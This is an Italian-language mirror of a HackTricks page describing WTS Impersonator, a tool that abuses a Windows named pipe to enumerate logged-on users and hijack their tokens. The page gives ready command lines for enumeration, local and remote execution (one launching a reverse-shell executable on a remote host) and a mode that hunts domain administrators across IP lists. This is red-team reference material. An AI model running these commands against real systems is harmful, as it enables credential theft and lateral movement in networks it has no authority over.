mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
4.5 KiB
4.5 KiB
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud github repos.
Lo strumento WTS Impersonator sfrutta la Named pipe RPC "\pipe\LSM_API_service" per enumerare in modo furtivo gli utenti connessi e dirottare i loro token, eludendo le tecniche tradizionali di impersonificazione dei token. Questo approccio facilita gli spostamenti laterali all'interno delle reti. L'innovazione dietro questa tecnica è attribuita a Omri Baso, il cui lavoro è accessibile su GitHub.
Funzionalità principali
Lo strumento opera attraverso una sequenza di chiamate API:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Moduli chiave e utilizzo
- Enumerazione degli utenti: È possibile enumerare gli utenti locali e remoti con lo strumento, utilizzando comandi per entrambi gli scenari:
- Localmente:
.\WTSImpersonator.exe -m enum
- In remoto, specificando un indirizzo IP o un nome host:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- Esecuzione di comandi: I moduli
exec
eexec-remote
richiedono un contesto di Servizio per funzionare. L'esecuzione locale richiede semplicemente l'eseguibile WTSImpersonator e un comando: - Esempio di esecuzione di un comando locale:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- È possibile utilizzare PsExec64.exe per ottenere un contesto di servizio:
.\PsExec64.exe -accepteula -s cmd.exe
- Esecuzione di comandi remoti: Coinvolge la creazione e l'installazione di un servizio in remoto simile a PsExec.exe, consentendo l'esecuzione con le autorizzazioni appropriate.
- Esempio di esecuzione remota:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Modulo di ricerca utente: Permette di individuare utenti specifici su più macchine, eseguendo codice con le loro credenziali. Questo è particolarmente utile per prendere di mira gli amministratori di dominio con diritti di amministratore locale su diversi sistemi.
- Esempio di utilizzo:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository github di HackTricks e HackTricks Cloud.